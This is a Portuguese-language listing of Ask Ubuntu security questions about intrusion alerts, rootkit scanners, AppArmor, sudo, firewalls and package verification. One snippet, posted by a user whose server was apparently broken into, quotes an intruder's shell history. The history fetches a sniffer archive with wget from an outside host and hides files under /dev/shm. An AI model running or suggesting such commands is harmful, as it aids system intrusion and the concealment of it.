Perguntas com a marcação «security»

Estou usando o Linux há um bom tempo e sempre sinto a necessidade de ter uma configuração passiva de software / script que possa me alertar sobre qualquer atividade suspeita na rede, como verificações, tentativas de login com falha, etc. em tempo real, por e-mail ou por e-mail. notificações visuais …

27 software-recommendation  security  firewall  logs 

Não foi possível encontrar nenhum provedor de VPN gratuito para o Ubuntu. Tentei investigar questões antigas, mas elas parecem desatualizadas.

27 security  vpn  privacy 

Recentemente, adquiri um Yubikey Neo - um pequeno dispositivo de autenticação de segundo fator. Ele se destina principalmente ao uso com Senhas de uso único e o protocolo U2F emergente - mas, desde a versão 2 do Yubikey, ele também suporta a autenticação de resposta a desafios HMAC-SHA1. O HMAC-SHA1 …

27 password  security  encryption  luks  yubikey 

Minha política corporativa diz que as caixas do Linux devem ser protegidas com o SELinux (para que um auditor de segurança possa marcar a caixa de seleção 'sim, estamos extremamente seguros!' Para cada servidor). Eu esperava aproveitar a incrível segurança padrão do AppArmor do Ubuntu. Não é aconselhável executar o …

27 security  permissions  apparmor 

Tenho 99,9% de certeza de que meu sistema no meu computador pessoal foi infiltrado. Permita-me primeiro apresentar meu raciocínio para que a situação fique clara: Cronograma aproximado de atividades suspeitas e ações subsequentes tomadas: 4-26 23:00 Finalizei todos os programas e fechei meu laptop. 4-27 12:00 Abri o laptop depois …

25 ssh  security  passwd-file 

A varredura por chkrootkit mostra "tcpd" como INFECTADO. Embora uma varredura por rkhunter mostre ok, (exceto para falsos positivos regulares) Devo ficar preocupado? (Estou no Ubuntu 16.10 com 4.8.0-37-generic)

25 security  malware  rootkit  tcpdump  chkrootkit 

Eu sei que a senha do sudo protege meu computador de ser hackeado localmente por alguém que tenha acesso físico a ele ( editar: na verdade, não ). Minha senha é forte o suficiente para esse fim, mas sei que não é forte o suficiente se alguém puder forçá-la remotamente. …

25 password  sudo  security 

Como 99% dos usuários, eu instalo o Ubuntu a partir de binários prontos. Como posso verificar se esses binários são de fato do código fonte original do Ubuntu? Seria bom verificar se a NSA / alguém não colaborou com o Ubuntu ou o Linode (meu provedor de VPS) para mexer …

25 security 

O Ubuntu vem com um firewall pré-instalado ou automático? Se não, eu preciso de um? Eu li alguns artigos sobre as vantagens do Linux em relação a outros sistemas operacionais sobre segurança (não há necessidade de antivírus, ...), mas gostaria de ter certeza.

25 security  firewall 

Estou executando o Ubuntu 10.04.1 LTS. Estou executando o rkhunter para verificar rootkits. O rkhunter está reclamando dos seguintes arquivos e diretórios ocultos. Acho que esses arquivos não são um problema real no meu sistema, mas como posso verificar se esses arquivos são legítimos? [07:57:45] Checking for hidden files and …

25 10.04  security  rkhunter 

Ontem, verifiquei meu histórico de comandos no meu VServer. Encontrei várias linhas suspeitas. 195 wget aridan.hol.es/sniffer.tgz 196 tar xvf sniffer.tgz 197 ls -a 198 rm -rf sniffer.tgz 199 rm -rf .sniff/ 200 cd /dev/shm 201 ls -a 202 mkdir " . " 203 ls -a 204 cd " . "/ …

24 ssh  security  malware 

Estou tentando entender o do-release-upgradeprocesso, ou seja, a maneira como o Ubuntu me solicita a atualização para a próxima versão do Ubuntu, na primavera ou no outono. Depois de ler as fontes ubuntu-release-upgrader, encontrei o arquivo / etc / update-manager / meta-release no meu sistema. Esse arquivo parece usar uma …

24 security  do-release-upgrade 

Algumas perguntas que quero responder na resposta: Como sei se o apparmor está em execução? Como posso saber se está funcionando bem?

24 security  apparmor 

Entendo que, se algum malware entrar no sistema Linux, ele obterá, no máximo, um privilégio no nível do usuário e arruinará qualquer coisa ao alcance do usuário, ou seja, os próprios arquivos do usuário. Mas o que exatamente impede que os malwares obtenham acesso no nível raiz? De alguma forma, …

24 security 

Em um sistema RedHat / CentOS, posso verificar os RPMs instalados no meu sistema usando rpm -V . Qual é o Ubuntu ou aptequivalente deste comando?

24 security  apt  rpm  deb